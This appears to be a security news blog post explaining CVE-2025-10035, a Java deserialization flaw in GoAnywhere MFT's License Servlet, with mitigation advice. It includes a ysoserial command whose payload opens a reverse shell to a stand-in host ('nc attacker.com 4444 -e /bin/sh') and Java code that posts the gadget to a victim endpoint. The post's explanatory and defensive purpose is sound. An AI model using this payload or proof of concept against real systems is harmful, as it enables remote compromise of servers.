CVE CyberSecurity Database News

CVE-2025-10035 - GoAnywhere MFT License Servlet Deserialization Flaw — How It Works and Why It Matters

Poster -

In early 2025, a serious vulnerability—CVE-2025-10035—was disclosed affecting Fortra’s GoAnywhere Managed File Transfer (MFT) solution. A bug in the License Servlet allows attackers to pass a *forged license signature* and get the Java app to blindly deserialize attacker-controlled objects, opening the door to remote command execution. Below, we walk through details of how this flaw works, including code snippets, technical explanation, exploit paths, and recommendations.

What Is GoAnywhere MFT?

GoAnywhere MFT is a popular managed file transfer solution used by enterprises to securely move sensitive data. It’s Java-based, with a web interface for admins, automation, and API endpoints—making it a juicy target for attackers.

The Core Problem: Deserialization in the License Servlet

The License Servlet is part of GoAnywhere’s process to validate user licenses. When an admin submits a license response, the system expects a signed payload, verifies it with a public key, and then deserializes it to read license info.

The flaw: If an attacker can forge a valid signature (for example, by obtaining the signing key, or via a signature validation bug), they can send crafted license payloads containing malicious Java objects. The vulnerable servlet will deserialize these objects *before* any safety checks, leading to arbitrary code execution under the application’s privileges.

Let’s simplify what the vulnerable flow in the License Servlet might look like

public void processLicenseResponse(HttpServletRequest req) throws IOException, ClassNotFoundException {
    byte[] licenseResponseBytes = req.getInputStream().readAllBytes();

    // Step 1: Verify the signature (potentially bypassed or forgeable)
    if (!verifySignature(licenseResponseBytes)) {
        throw new SecurityException("Invalid license signature!");
    }

    // Step 2: Deserialize the license object
    ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(licenseResponseBytes));
    Object licenseObj = ois.readObject();  // Vulnerability here!
    // ... operate on licenseObj ...
}

Problem: If the attacker sends a serialized Java object gadget (see ysoserial), it gets deserialized. If a gadget in the classpath allows code execution, it will run *immediately* during deserialization.

Submit this fake license response to the servlet.

If successful, the attacker’s payload will be deserialized, and any code in its readObject() method (or chained methods) will execute with *system* or *GoAnywhere app* privileges.

Proof of Concept Exploit

Let’s say the app uses commons-collections, a popular Java deserialization target. A simple exploit workflow would be:

Generate a malicious payload with ysoserial

`sh

java -jar ysoserial.jar CommonsCollections1 'nc attacker.com 4444 -e /bin/sh' > shell.ser

Example of malicious payload binary in Java

// Example: using ysoserial-generated byte[] payload
byte[] gadgetBytes = Files.readAllBytes(Paths.get("gadget.ser"));

HttpURLConnection conn = (HttpURLConnection)new URL("https://victim:800/goanywhere/license";).openConnection();
conn.setDoOutput(true);
conn.setRequestMethod("POST");
conn.getOutputStream().write(gadgetBytes);
int response = conn.getResponseCode();
System.out.println("Response: " + response);

For a real-world attack, the attacker must find a way to produce the *valid signature* as expected by the application, which may require additional flaws.

Impact

- Remote Code Execution: This is as bad as it gets; system compromise, data exfiltration, lateral movement.

Mitigation

- *Patch ASAP!* Fortra will release updates (GoAnywhere Security Advisories).

Block suspicious external access to management interfaces.

- Apply strict allowlisting on deserialization targets, or better—do not deserialize untrusted data.

References and Further Reading

- Fortra GoAnywhere Security Advisories
- CVE-2025-10035 NVD Listing (pending as of writing)
- Understanding Java Deserialization Attacks
- ysoserial Java gadgets tool (for PoC and testing)

Closing Thoughts

Deserialization bugs like CVE-2025-10035 in enterprise file transfer solutions show the dangers of mixing serialized objects and user input—even when you try to “secure” them with signatures. If you use GoAnywhere MFT, treat all incoming updates as critical, restrict admin access, and patch without delay.

Remember: Never trust user-provided data—especially when Java ObjectInputStream is involved.


*If you’re responsible for GoAnywhere, prioritize this fix now. If you’re a defender, monitor for suspicious license activity and stay alert for post-exploitation signs. Stay safe!*

Timeline

Published on: 09/18/2025 22:15:41 UTC
Last modified on: 10/24/2025 13:44:10 UTC